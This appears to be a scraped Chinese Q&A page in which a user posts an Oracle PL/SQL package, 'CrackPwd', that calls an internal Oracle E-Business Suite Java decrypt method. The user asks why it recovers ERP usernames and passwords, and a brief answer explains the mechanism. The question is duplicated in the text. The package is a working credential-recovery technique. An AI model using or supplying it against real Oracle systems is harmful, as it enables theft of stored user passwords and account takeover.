UC知道请教下列代码的详细解释(理论)
来源:百度知道 编辑:UC知道 时间:2024/05/26 02:20:34
CREATE OR REPLACE PACKAGE BODY CrackPwd
AS
FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA
NAME
'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String)
return java.lang.String';
END CrackPwd;
请说明为什麼以上代码会抓出ORACLE ERP系统的用户名和密码......
请详细解释原理
AS
FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA
NAME
'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String)
return java.lang.String';
END CrackPwd;
请说明为什麼以上代码会抓出ORACLE ERP系统的用户名和密码......
请详细解释原理
decrypt 是一个java解密类,根据 登录的用户和加密后的密码,解出真正的密码,用户名称和密码好像还是从网页登录的,放到 seesion中的,具体的可以反编译oracle.apps.fnd.security.WebSessionManagerProc.decrypt